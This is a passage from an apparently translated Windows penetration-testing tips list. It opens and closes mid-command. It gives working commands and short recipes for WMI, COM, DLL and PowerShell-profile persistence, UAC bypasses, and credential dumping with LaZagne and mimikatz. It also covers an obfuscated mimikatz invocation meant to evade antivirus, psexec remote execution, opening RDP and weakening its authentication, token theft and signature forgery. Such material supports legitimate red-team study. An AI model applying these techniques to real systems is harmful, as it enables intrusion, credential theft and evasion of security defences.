ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\n```\n\nReference:\n\n[《Study Notes of WMI Persistence using wmic.exe》](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe)\n\n#### Method 4: Userland Persistence With Scheduled Tasks\n\nHijack the scheduled task UserTask, load testmsg.dll at system startup.\n\nThe operation is as follows:\n\nCreate a new item under HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{58fb76b9-ac85-4e55-ac04-427593b1d060}\n\nThen create a new item InprocServer32\n\nThe value is set to `c:\\test\\testmsg.dll`\n\nTestmsg.dll contains the following export functions:\n\n- DllCanUnloadNow\n- DllGetClassObject\n- DllRegisterServer\n- DllUnregisterServer\n\nWaiting for users to log in again.\n\nReference:\n\n[《Userland registry hijacking》](https://3gstudent.github.io/Userland-registry-hijacking)\n\n#### Method 5: Netsh\n\nThe helper DLL needs to include the export function InitHelperDll.\n\nAdministrator privileges:\n\n```\nnetsh add helper c:\\test\\netshtest.dll\n```\n\nAfter the helper dll is successfully added, c:\\test\\netshtest.dll will be loaded each time netsh is called.\n\nReference:\n\n[《Netsh persistence》](https://3gstudent.github.io/Netsh-persistence)\n\n#### Method 6: Shim\n\nCommon ways:\n\n- InjectDll\n- RedirectShortcut\n- RedirectEXE\n\n[《渗透测试中的Application Compatibility Shims》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims)\n\n#### Method 7: dll hijacking\n\nAutomatically enumerate processes through Rattler to detect the existence of available dll hijacking processes.\n\npath:\n\n- c:\\windows\\midimap.dll\n\nReference:\n\n[《DLL劫持漏洞自动化识别工具Rattler测试》](https://3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95)\n\n#### Method 8: DoubleAgent\n\nWrite a custom Verifier provider DLL.\n\nInstall via Application Verifier.\n\nInject into the target process to execute the payload.\n\nWhenever the target process starts, it will execute payload, which is equivalent to a self-starting method.\n \nReference:\n\n[《渗透测试中的Application Verifier(DoubleAgent利用介绍)》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D))\n\n#### Method 9: waitfor.exe\n\nSelf-starting is not supported, but can be activated remotely, and the process is displayed as waitfor.exe\n\nReference:\n\n[《Use Waitfor.exe to maintain persistence》](https://3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence)\n\n#### Method 10: AppDomainManager\n\nFor .Net programs, they can be hijacked by modifying the AppDomainManager. \nIf you hijack the startup process of a system common .Net program such as powershell.exe and add a payload to it, you can implement a passive backdoor trigger mechanism.\n\nReference:\n\n[《Use AppDomainManager to maintain persistence》](https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence)\n\n#### Method 11: Office Add-ins\n\nIf the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor.\n\nCommonly used methods:\n\n- Word WLL\n- Excel XLL\n- Excel VBA add-ins\n- PowerPoint VBA add-ins\n\nPOC: https://github.com/3gstudent/Office-Persistence\n\nReference:\n\n[《Use Office to maintain persistence》](https://3gstudent.github.io/Use-Office-to-maintain-persistence)\n\n[《Office Persistence on x64 operating system》](https://3gstudent.github.io/Office-Persistence-on-x64-operating-system)\n\n#### Method 12: CLR\n\nBackdoor without administrator privileges and the ability to hijack all .Net programs.\n\nPOC: https://github.com/3gstudent/CLR-Injection\n\nReference:\n\n[《Use CLR to maintain persistence》](https://3gstudent.github.io/Use-CLR-to-maintain-persistence)\n\n#### Method 13: msdtc\n\nUse the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.\n\nReference:\n\n[《Use msdtc to maintain persistence》](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence)\n\n#### Method 14: Hijack CAccPropServicesClass and MMDeviceEnumerator\n\nNo need to reboot the system, no administrator privileges required.\n \nImplemented by modifying the registry/\n\nPOC: https://github.com/3gstudent/COM-Object-hijacking\n\nReference:\n\n[《Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator》](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator)\n\n#### Method 15: Hijack explorer.exe\n\nNo need to reboot the system, no administrator privileges required\n\nImplemented by modifying the registry\n\nReference:\n\n[《Use COM Object hijacking to maintain persistence——Hijack explorer.exe》](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe)\n\n#### Method 16: Windows FAX DLL Injection\n\nBy DLL hijacking, hijacking Explorer.exe to load fxsst.dll.\n\nExplorer.exe will load `c:\\Windows\\System32\\fxsst.dll` at startup (service is enabled by default for fax service)\n\nSave the payload.dll in c:\\Windows\\fxsst.dll, which can implement dll hijacking, hijacking Explorer.exe to load fxsst.dll.\n\nThe same idea:\n\nRename payload.dll to linkinfo.dll and hijack Explorer.exe to load linkinfo.dll。\n\n#### Method 17: Hijack specific features of Office software\n\nBy dll hijacking, triggers backdoors when Office software performs certain functions.\n\nReference:\n\n[《利用BDF向DLL文件植入后门》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8)\n\n#### Method 18: Special Registry Keys\n\nCreate a special name for the registry key, which the user normally cannot read (use the Win32 API), but the system can execute (use the Native API)\n\nReference:\n\n[《渗透技巧——\"隐藏\"注册表的创建》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA)\n\n[《渗透技巧——\"隐藏\"注册表的更多测试》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95)\n\n#### Method 19: Powershell Configuration File\n\nModify the powershell configuration file, the backdoor is triggered after the powershell process starts.\n\nCheck to see if you are using a configuration file:\n\n```\nTest-Path $profile\n```\n\nCreate a configuration file:\n\n```\nNew-Item -Path $profile -Type File –Force\n```\n\nModify the contents of the configuration file and add a backdoor:\n\n```\n$string = 'Start-Process \"cmd.exe\"'\n$string | Out-File -FilePath \"C:\\Users\\a\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1\" -Append\n```\n\nFrom:\n\nhttps://rastamouse.me/2018/03/a-view-of-persistence/\n\n#### Method 20: xml file\n\n\nReference:\n\n[《https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8)\n\n---\n\n### Tips 31. UAC bypass\n\n#### Method 1: use eventvwr.exe and registry hijacking\n\nApplicable: Win7, Win8.1, Win 10\n\nhttps://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1\n\nReference:\n\n[《Study Notes of WMI Persistence using wmic.exe》](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe)\n\n[《Userland registry hijacking》](https://3gstudent.github.io/Userland-registry-hijacking)\n\n#### Method 2: use sdclt.exe\n\nFor Win10\n\nReference:\n\n[《Study Notes of using sdclt.exe to bypass UAC》](https://3gstudent.github.io/Study-Notes-of-using-sdclt.exe-to-bypass-UAC)\n\n#### Method 3: use SilentCleanup\n\nFor Win8, Win10\n\n```\nreg add hkcu\\Environment /v windir /d \"cmd /K reg delete hkcu\\Environment /v windir /f \u0026\u0026 REM \"\nschtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I\n```\n\nReference:\n\n[《Study Notes of using SilentCleanup to bypass UAC》](https://3gstudent.github.io/Study-Notes-of-using-SilentCleanup-to-bypass-UAC)\n\n#### Method 4: use wscript.exe\n\nOnly for Win7\n\nhttps://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1\n\nReference:\n\n[《Empire中的Invoke-WScriptBypassUAC利用分析》](https://3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90)\n\n#### Method 5: use cmstp.exe\n\nhttps://msitpros.com/?p=3960\n\nOnly for Win7\n\n#### Method 5: Modify environment variables, hijack high-privilege .Net programs\n\nFor Win7-Win10\n\nEg. gpedit.msc\n\nModify the environment variables, use the CLR to hijack the boot process of gpedit.msc.\n\nReference:\n\n[《Use CLR to bypass UAC》](https://3gstudent.github.io/Use-CLR-to-bypass-UAC)\n\n#### Method 6: Modify the registry HKCU\\Software\\Classes\\CLSID, hijack high-privilege program\n\nFor Win7-Win10\n\n- {B29D466A-857D-35BA-8712-A758861BFEA1}\n- {D5AB5662-131D-453D-88C8-9BBA87502ADE}\n- {0A29FF9E-7F9C-4437-8B11-F424491E3931}\n- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\n\nReference:\n\n[《Use CLR to bypass UAC》](https://3gstudent.github.io/Use-CLR-to-bypass-UAC)\n\n#### Method 7: Use COM Components\n\nModify process information, spoof PSAPI, call COM component to implement unauthorized operation.\n\nReference:\n\n[《通过COM组件IFileOperation越权复制文件》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6IFileOperation%E8%B6%8A%E6%9D%83%E5%A4%8D%E5%88%B6%E6%96%87%E4%BB%B6)\n\n[《通过COM组件NetFwPolicy2越权关闭防火墙》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6NetFwPolicy2%E8%B6%8A%E6%9D%83%E5%85%B3%E9%97%AD%E9%98%B2%E7%81%AB%E5%A2%99)\n\n[《通过COM组件IARPUninstallStringLauncher绕过UAC》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB%B6IARPUninstallStringLauncher%E7%BB%95%E8%BF%87UAC)\n\n---\n\n### Tips 32. The exe or DLL generated by Visual Studio is used in other systems, indicating the lack of relevant DLL files.\n\nWorkaround:  Package the program for release.\n\nProject Menu -\u003e Project Properties, C / C + + -\u003e Code Generation -\u003e Run Library, select multi-threading (/MT)\n\n---\n\n### Tips 33. Use LaZagne to export passwords stored in common applications in the current system.\n\nYou can use LaZagne to export passwords stored in common applications in the current system (eg browser, Wifi, Git, Outlook, etc.)\n\nhttps://github.com/AlessandroZ/LaZagne\n\nOf course, you can also modify the LaZagne source code to implement password export for other applications.\n\nReference:\n\n[《本地密码查看工具LaZagne中的自定义脚本开发》](https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91)\n\n---\n\n### Tips 34. Use powershell to read and write files\n\nRead a text file:\n\n```\n$file = Get-Content \"1.txt\"\n```\n\nWrite a text file:\n\n```\nSet-content \"1.txt\"\n```\n\nRead a binary file:\n\n```\n[System.IO.File]::ReadAllBytes('1.exe')\n```\n\nWrite a binary file:\n\n```\n[System.IO.File]::WriteAllBytes(\"1.exe\",$fileContentBytes)\n```\n\n---\n\n### Tips 35. powershell for base64 encoding/decoding\n\nEncoding:\n\n```\n$encoded = [System.Convert]::ToBase64String($fileContent)\n```\n\nDecoding:\n\n```\n$fileContent = [System.Convert]::FromBase64String($encoded)\n```\n\nReference:\n\n[《Study Notes of using BGInfo to bypass Application Whitelisting》](https://3gstudent.github.io/Study-Notes-of-using-BGInfo-to-bypass-Application-Whitelisting)\n\n---\n\n### Tips 36 If the powershell script is killed, try using Invoke-Obfuscation for confusion.\n\nhttps://github.com/danielbohannon/Invoke-Obfuscation\n\nEg.\n\nSet the code to be confused:\n\n```\nset scriptblock \" Invoke-111111 -Command \"log privilege::debug sekurlsa::logonpasswords exit\" \"\n```\n\nEnter `encoding`\n\nEnter `1` and specify the encoding as ascii\n\nGet confused code:\n\n```\n\" $(SEt-iTem  'VARIaBle:OFS' '' ) \"+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67, 111, 109 , 109, 97 , 110 , 100 , 32,34,108, 111, 103 ,32, 112 ,114 , 105,118,105,108, 101, 103 ,101, 58 , 58 , 100 , 101 , 98, 117 ,103,32 , 115,101,107 ,117,114 , 108,115, 97 ,58 , 58, 108 ,111 ,103,111,110, 112, 97, 115 ,115,119, 111, 114, 100, 115, 32, 101, 120,105,116 ,34 )|FOReacH-objeCT{( [ChAR][iNT] $_) } ) +\"$( Set-variAbLE  'oFS'  ' ' ) \"|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')\n```\n\n---\n\n### Tips 37 python script to exe\n\nTwo common methods:\n\n- Use py2exe\n- Use PyInstaller\n\nHow to use and common bug fixes can refer to the reference link\n \nReference:\n\n[《本地密码查看工具LaZagne中的自定义脚本开发》](https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91)\n\n---\n\n### Tips 38 Normal user rights write files to the path of administrator rights\n\nEg.\n\nRelease files to the `c:\\windows` folder with normal user rights\n\n```\nmakecab c:\\test\\test.exe %TMP%\\1.tmp\nwusa %TMP%\\1.tmp /extract:\"c:\\windows\" /quiet\n```\n\nApplicable to Win7, Win8, learning from:\n\nhttps://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1\n\nReference:\n\n[《Empire中的Invoke-WScriptBypassUAC利用分析》](https://3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90)\n\n---\n\n### Tips 39 Summary of methods for executing programs on remote systems\n\nCommon methods:\n\n- at\n- psexec\n- WMIC\n- wmiexec\n- smbexec\n- powershell remoting\n\nPsexec usage:\n\n```\npsexec.exe \\\\test.local /accepteula -u test\\admin -p test123! -s -c test.bat\n```\n\nTest.bat is local\n\nNew method:\n\n- DCOM\n\nReference:\n\n[《域渗透——利用DCOM在远程系统执行程序》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F)\n\n---\n\n### Tips 40 Looking for services that can be utilized in Windows systems\n\nEnumerate the path of the executable file corresponding to the Windows system service. If the path contains the write permission of the normal user, the service can be used to increase the permission.\n\npowershell code:\n\n```\n$ErrorActionPreference=\"SilentlyContinue\"\n$out = (Get-WmiObject win32_service | select PathName)\n$out|% {[array]$global:path += $_.PathName}\nfor($i=0;$i -le $out.Count-1;$i++)\n{\n    $a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny(\"C\"),$out[$i].PathName.ToUpper().LastIndexOfAny(\"\\\"))\n \tIf($a.Owner -ne \"NT AUTHORITY\\SYSTEM\"){\n\t\tIf($a.Owner -ne \"NT SERVICE\\TrustedInstaller\"){\n\t\t\tIf($a.Owner -ne \"BUILTIN\\Administrators\"){\t\t\t\t\n\t\t\t\tGet-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status\n\t\t\t\tWrite-host Owner: $a.Owner\n\t\t\t}\t\n\t\t}\n    }\n}\nWrite-host [+] All done.\n```\n\nReference:\n\n[《Use powershell to find a writable windows service》](https://3gstudent.github.io/Use-powershell-to-find-a-writable-windows-service)\n\n---\n\n### Tips 41 Use anti-virus software configuration errors to achieve self-starting and prioritizing anti-virus software execution\n\nWindows system supports Logon Scripts. Logon Scripts are executed at system startup. The execution order takes precedence over anti-virus software. Of course, anti-virus software cannot intercept the scripts in Logon Scripts (anti-virus software has not been started).\n\nThe key is whether the anti-virus software will intercept the configuration of Logon Scripts.\n\nAdd Logon Scripts with special operations, antivirus software will not intercept.\n\n**Note:**\n\nThe anti-virus software mentioned above refers to \"partial\" anti-virus software, which is not universal.\n\nReference:\n\n[《Use Logon Scripts to maintain persistence》](https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence)\n\n---\n\n### Tips 42 Compiling c# program notes\n\nUse Visual Studio:\n\nThe project name should correspond to the name specified by namespace. If it does not correspond, it can be modified in the project-attribute-assembly name. Otherwise, the generated dll cannot be used.\n\nUse csc.exe:\n\nEg.\n\n```\nusing System;\nusing System.Diagnostics;\n\nnamespace TestDotNet\n{\n   public class Class1\n   {\n      static Class1()\n      { \n         Process.Start(\"cmd.exe\");\n         Environment.Exit(0);\n      }\n   }\n}\n```\n\nSave it as TestDotNet.cs and just use csc.exe to generate it:\n\n`C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /t:library TestDotNet.cs`\n\nIf saved as a.cs, ​​then you need to add /out parameter to specify the output file as TestDotNet.dll, so the assembly name is also defaulted to TestDotNet (corresponding to the same code), otherwise, although the dll can be loaded, but can not be executed, the parameters are as follows :\n\n`C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /t:library /out:TestDotNet.dll a.cs`\n\n---\n\n### Tips 43 Port problem with IPC connection\n\nUse IPC connection, if the target is enabled with NetBIOS over TCP/IP, then:\n\n1. The target opens both ports 139 and 445, and the system preferentially uses port 445.\n2. Target disables port 445 and can connect using port 139\n\nTarget If NetBIOS over TCP/IP is disabled, then:\n\n1. Target disables port 445 and cannot connect\n\n---\n\n### Tips 44 Get TrustedInstaller Permissions\n\nStart the service TrustedInstaller and get the TrustedInstaller permission through Token replication.\n\nCommon methods:\n\n- SelectMyParent\n- Invoke-TokenManipulation.ps1\n- incognito\n\nReference:\n\n [渗透技巧——Token窃取与利用](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8)\n\n---\n\n### Tips 45 3389 Remote Desktop Connection\n\n#### 1, Query whether the system allows 3389 remote desktop connection:\n\n`REG QUERY \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections`\n\n1 means closed, 0 means open\n\nView the port of the remote desktop connection:\n\n`REG QUERY \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber`\n\n#### 2, the method of opening 3389 Remote Desktop Connection\n\nMethod 1:  cmd\n\n```\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f\nREG ADD \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x00000d3d /f\n```\n\nMethod 2:  reg file\n\nThe content is as follows:\n\n```\nWindows Registry Editor Version 5.00\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]\n\"fDenyTSConnections\"=dword:00000000\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]\n\"PortNumber\"=dword:00000d3d\n```\n\nImport the registry:\n\n`regedit /s a.reg`\n\n**Note:**\n\nModify the connection port to take effect after restarting\n\n**supplement**\n\nIf the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows:\n\n`netsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow`\n\nIf the connection fails and it says:`An authentication error has occurred.The function requested is not supported.`\n\nWe need to close this: `Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)` \n\n`REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f`\n\n#### 3, connect the remote desktop\n\nKali:\n\n`rdesktop 192.168.1.1:3389`\n\nWindows:\n\n`mstsc.exe`\n\nNon-server version of Windows, only one account is allowed to log in by default.\n\nThe specific performance is:\n\nWhen logging in remotely, use the same account as the original system, the original system will be switched to the login interface.\n\nUse a different account, the original system desktop will prompt you to disconnect the current connection (default selection after 30 seconds)\n\n**Solution:**\n\nUse mimikatz.exe to execute `ts::multirdp` to allow multiple users to log in remotely.\n\nThe ability to achieve remote login of different accounts does not conflict, the original system desktop will not prompt the box.\n\nOf course, use the same account as the original system, the original system will still be switched to the login interface.\n\n**Note:**\n\nThis method fails after the system restarts. The next time you use it, you need to re-execute the command `ts::multirdp`.\n\nIt will be permanently modified by modifying the file termsrv.dll.\n\nReference:\n\n[《渗透技巧——Windows系统远程桌面的多用户登录》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95)\n\n---\n\n### Tips 46 Use netsh to modify firewall rules for remote systems\n\n The remote system needs to allow the Windows Firewall to remotely manage. \n The open command is as follows:\n\n```\nnetsh advfirewall set currentprofile settings remotemanagement enable\n```\n\nEg.\n\n```\nnetsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\n``` \n\nReference:\n\n[《域渗透——利用DCOM在远程系统执行程序》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F)\n\n---\n\n### Tips 47 Hijacking UAC\n\nWhen the UAC prompt box is popped up, execute arbitrary code, and insert the payload by modifying the function of the registry hijacking signature verification.\n\nReference:\n\n[《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81)\n\n---\n\n### Tips 48  Authenticode signature forgery of PE files\n\nBy modifying the registry, you can add a Microsoft certificate to the PE file.\n\nReference:\n\n[《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81)\n\n[《Authenticode签名伪造——针对文件类型的签名伪造》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-%E9%92%88%E5%AF%B9%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0)\n\n---\n\n### Tips 49 Catalog signature forgery of PE files\n\nConstruct Long UNC file name, implement file name spoofing, get Catalog signature\n\nReference:\n\n[《Catalog签名伪造——Long UNC文件名欺骗》](https://3gstudent.github.io/Catalog%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-Long-UNC%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97)\n\n---\n\n### Tips 50 mklink\n\nUsed to create symbolic links, which can be understood as shortcuts.\n\nCreate the directory c:\\test\\1, point to c:\\temp, and use the following actions:\n\n(1) Create a link with the /D parameter command:\n\nMklink /D \"c:\\test\\1\" \"c:\\Temp\"\n \n(2) Create a join using the /J parameter command:\n\nMklink /J \"c:\\test\\1\" \"c:\\Temp\"\n\ndifference：\n\nThe link created with the /D parameter has more \"file shortcuts\" for file attributes.\n \nUse /J does not require administrator privileges.\n \nUse /D requires administrator privileges.\n \n**Application scenario:**\n \nChange the path to the released file.\n\n---\n\n### Tips 51Passes parameters when executing powershell scripts\n\n```\npowershell -executionpolicy bypass -Command \"Import-Module .\\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts\"\n\npowershell -executionpolicy bypass -Command \"Import-Module .\\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command \"\"log \"\"privilege::debug\"\" \"\"sekurlsa::logonpasswords\"\"\"\"\"\n```\n\n---\n\n### Tips 52 dll injection method\n\n#### 1, APC\n\nReference:\n\n[《通过APC实现Dll注入——绕过Sysmon监控》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7)\n\n#### 2, process hollowing\n\nReference:\n\n[《傀儡进程的实现与检测》](https://3gstudent.github.io/%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%AE%9E%E7%8E%B0%E4%B8%8E%E6%A3%80%E6%B5%8B)\n\n#### 3, Process Doppelgänging\n\nReference:\n\n[《Process Doppelganging利用介绍》](https://3gstudent.github.io/Process-Doppelganging%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)\n\n---\n\n### Tips 53 Default shared directory in the domain\n\n```\n\\\\\u003cDOMAIN\u003e\\SYSVOL\\\u003cDOMAIN\u003e\\\n```\n\nAll hosts in the domain can access, which saves group policy related data, including login script configuration files, etc.\n\nReference:\n\n[《域渗透——利用SYSVOL还原组策略中保存的密码》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)\n\n---\n\n### Tips 54 Your TeamViewer may be hacked\n\nIf your TeamViewer version is `13.0.5058`, don't feel free to connect to an unknown TeamViewer server, it may be hacked.\n\nReference:\n\n[《TeamViewer 13.0.5058中的权限漏洞测试》](https://3gstudent.github.io/TeamViewer-13.0.5058%E4%B8%AD%E7%9A%84%E6%9D%83%E9%99%90%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95)\n\n---\n\n### Tips 55 Remotely view domain-related login and logout related logs:\n\n#### Method 1:\n\n```\nwevtutil qe security /rd:true /f:text /q:\"*[System[(EventID=4672 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime\u003e='2022-05-26T02:30:39' and @SystemTime\u003c='2022-05-26T02:31:00']]]\" /r:dc1 /u:administrator /p:password \n\nwevtutil qe security /rd:true /f:text /q:\"(Event/System/EventID=4624 or 4623 or 4672) and Event/System/TimeCreated/@SystemTime \u003e= '2022-05-26T02:30:39' and Event/System/TimeCreated/@SystemTime \u003c= '2022-05-26T02:31:00'\" /r:dc1 /u:administrator /p:password \n```\n\n#### Method 2\n\n(Not recommended, direct download file is too large)\n\nObtain the domain control file: `C:\\Windows\\System32\\winevt\\Logs\\Security.evtx`, filter event 4624/4623/4672.\n\n---\n\n### Tips 56 Determine if the current system is in standby mode.\n\nThe function return value of GetForegroundWindow() in the lock screen state is NULL, and the return value of GetForegroundWindow() function in non-lock screen state is a non-zero value.\n\nReference:\n\nhttps://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen\n\nPowershell POC:\n\nhttps://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1\n\n---\n\n### Tips 57 Get the current system user no input time\n\nJudge through API GetIdleTime.\n \nc#:\n\nhttps://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C\n\npowershell:\n\nhttps://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1\n\n---\n\n### Tips 58 Determine the screen saver startup time of the current system\n\nDetermine whether to open the screen saver:\n\nFind the registry `HKEY_CURRENT_USER\\Control Panel\\Desktop`, if there is a key value `SCRNSAVE.EXE`.\n\n```\nREG QUERY \"HKEY_CURRENT_USER\\Control 